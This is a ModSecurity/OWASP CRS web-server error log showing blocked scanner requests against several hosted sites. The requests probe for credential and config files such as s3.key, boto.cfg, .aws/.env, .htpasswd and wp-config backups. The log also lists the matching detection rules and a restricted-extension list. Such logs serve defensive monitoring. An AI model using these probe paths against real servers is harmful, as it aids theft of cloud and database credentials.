[Mon May 11 11:50:13.847262 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:41574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/debug.log"] [unique_id "agGmVRjZymfuKpjWXeh7lQAAANI"]
[Mon May 11 11:50:15.064253 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:41574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmVRjZymfuKpjWXeh7lQAAANI"]
[Mon May 11 11:50:38.867918 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:62108] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:rename. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:rename: .bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmbhjZymfuKpjWXeh8UAAAANc"]
[Mon May 11 11:50:38.869515 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:62108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmbhjZymfuKpjWXeh8UAAAANc"]
[Mon May 11 11:50:38.974439 2026] [security2:error] [pid 1254133:tid 1254159] [client 216.73.216.110:62108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmbhjZymfuKpjWXeh8UAAAANc"]
[Mon May 11 11:50:41.176710 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:33830] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/s3.key"] [unique_id "agGmcUYQeUtAPynIs6xXygAAABg"]
[Mon May 11 11:50:41.177910 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:33830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/s3.key"] [unique_id "agGmcUYQeUtAPynIs6xXygAAABg"]
[Mon May 11 11:50:42.411682 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:33830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmcUYQeUtAPynIs6xXygAAABg"]
[Mon May 11 11:50:42.446307 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:33840] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/s3.key"] [unique_id "agGmckRdw2n9wv6Ai48H4QAAAIk"]
[Mon May 11 11:50:42.447213 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:33840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/s3.key"] [unique_id "agGmckRdw2n9wv6Ai48H4QAAAIk"]
[Mon May 11 11:50:43.739652 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:33840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmckRdw2n9wv6Ai48H4QAAAIk"]
[Mon May 11 11:50:56.914701 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:37492] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/etc/boto.cfg"] [unique_id "agGmgEYQeUtAPynIs6xX9gAAABA"]
[Mon May 11 11:50:56.915149 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:37492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/etc/boto.cfg"] [unique_id "agGmgEYQeUtAPynIs6xX9gAAABA"]
[Mon May 11 11:50:58.222191 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:37492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmgEYQeUtAPynIs6xX9gAAABA"]
[Mon May 11 11:50:58.247875 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:37494] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/etc/boto.cfg"] [unique_id "agGmgpkIEwRJMyDaV55OMwAAAUI"]
[Mon May 11 11:50:58.248323 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:37494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/etc/boto.cfg"] [unique_id "agGmgpkIEwRJMyDaV55OMwAAAUI"]
[Mon May 11 11:51:00.476657 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:37494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmgpkIEwRJMyDaV55OMwAAAUI"]
[Mon May 11 11:51:18.518585 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:57484] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.aws/.env.save-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.aws/.env.save-update"] [unique_id "agGmlr4KNmD_mZ_vlf84dQAAAE8"]
[Mon May 11 11:51:18.519239 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:57484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.aws/.env.save-update"] [unique_id "agGmlr4KNmD_mZ_vlf84dQAAAE8"]
[Mon May 11 11:51:18.920545 2026] [security2:error] [pid 1254328:tid 1254339] [client 216.73.216.110:10426] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:rights. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:rights: .bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmlkRdw2n9wv6Ai48IEAAAAIg"]
[Mon May 11 11:51:18.922222 2026] [security2:error] [pid 1254328:tid 1254339] [client 216.73.216.110:10426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmlkRdw2n9wv6Ai48IEAAAAIg"]
[Mon May 11 11:51:19.010269 2026] [security2:error] [pid 1254328:tid 1254339] [client 216.73.216.110:10426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmlkRdw2n9wv6Ai48IEAAAAIg"]
[Mon May 11 11:51:19.707482 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:57484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmlr4KNmD_mZ_vlf84dQAAAE8"]
[Mon May 11 11:51:19.732896 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:57492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.aws/.env.save-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.aws/.env.save-update"] [unique_id "agGml74KNmD_mZ_vlf84eAAAAEE"]
[Mon May 11 11:51:19.733323 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:57492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.aws/.env.save-update"] [unique_id "agGml74KNmD_mZ_vlf84eAAAAEE"]
[Mon May 11 11:51:20.942505 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:57492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGml74KNmD_mZ_vlf84eAAAAEE"]
[Mon May 11 11:51:20.967932 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:57494] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.aws/.htpasswd-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.aws/.htpasswd-update"] [unique_id "agGmmERdw2n9wv6Ai48IEgAAAIQ"]
[Mon May 11 11:51:20.968381 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:57494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.aws/.htpasswd-update"] [unique_id "agGmmERdw2n9wv6Ai48IEgAAAIQ"]
[Mon May 11 11:51:22.152730 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:57494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmmERdw2n9wv6Ai48IEgAAAIQ"]
[Mon May 11 11:51:22.178691 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:57496] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /.aws/.htpasswd-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.aws/.htpasswd-update"] [unique_id "agGmmr4KNmD_mZ_vlf84eQAAAFM"]
[Mon May 11 11:51:22.179027 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:57496] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.aws/.htpasswd-update"] [unique_id "agGmmr4KNmD_mZ_vlf84eQAAAFM"]
[Mon May 11 11:51:23.403466 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:57496] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmmr4KNmD_mZ_vlf84eQAAAFM"]
[Mon May 11 11:51:37.854137 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:44030] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /.aws/wp-config.bak.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.aws/wp-config.bak.orig"] [unique_id "agGmqZkIEwRJMyDaV55OTgAAAUE"]
[Mon May 11 11:51:37.854626 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:44030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.aws/wp-config.bak.orig"] [unique_id "agGmqZkIEwRJMyDaV55OTgAAAUE"]
[Mon May 11 11:51:40.046400 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:44030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmqZkIEwRJMyDaV55OTgAAAUE"]
[Mon May 11 11:51:40.072243 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:44036] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /.aws/wp-config.bak.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.aws/wp-config.bak.orig"] [unique_id "agGmrJkIEwRJMyDaV55OTwAAAVI"]
[Mon May 11 11:51:40.072829 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:44036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.aws/wp-config.bak.orig"] [unique_id "agGmrJkIEwRJMyDaV55OTwAAAVI"]
